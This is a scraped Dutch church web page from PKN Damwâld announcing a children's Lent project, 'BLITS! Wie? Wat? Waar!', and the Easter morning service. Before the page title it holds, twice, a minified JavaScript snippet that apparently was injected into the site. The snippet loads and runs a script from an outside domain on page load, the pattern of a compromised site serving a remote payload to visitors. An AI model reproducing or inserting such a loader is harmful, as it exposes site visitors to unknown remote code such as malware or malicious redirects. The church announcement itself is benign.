;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); BLITS! Wie? Wat? Waar!  40-dagen project - PKN Damwâld

BLITS! Wie? Wat? Waar!  40-dagen project

Gepubliceerd op: maandag 3 april 2023

De afgelopen weken en tot aan Pasen hebben we het tijdens Blits! over:   Wie? Wat? Waar! We zijn op zoek naar wie Jezus is. Op de eerste vier zondagen van de 40 dagentijd lazen we Bijbelverhalen waarin verschillende mensen zich afvragen wie Jezus is en wat het betekent wat Hij zegt en doet.

Het Paasfeest vieren we met het verhaal van de Emmaüsgangers, die Jezus ontmoeten en Hem uiteindelijk herkennen als de opgestane Heer. In de loop naar de paasdienst maken de kinderen elke week een knutsel. Deze laten ze dan paaszondag vast, vol trots, aan een iedereen in de kerk zien.

Komt daarom allen eerste Paasdag om 09.30 uur naar de ochtenddienst in de Ontmoeting. Het thema voor deze dienst is: Hij is opgestaan, het is echt waar! De kinderen gaan tijdens de dienst even de kerkzaal uit, maar blijven allemaal (dus ook groep 6,7 en 8) in de Ontmoeting.

p.s. Onze dank aan alle gemeenteleden die paastakken ter beschikking hebben gesteld.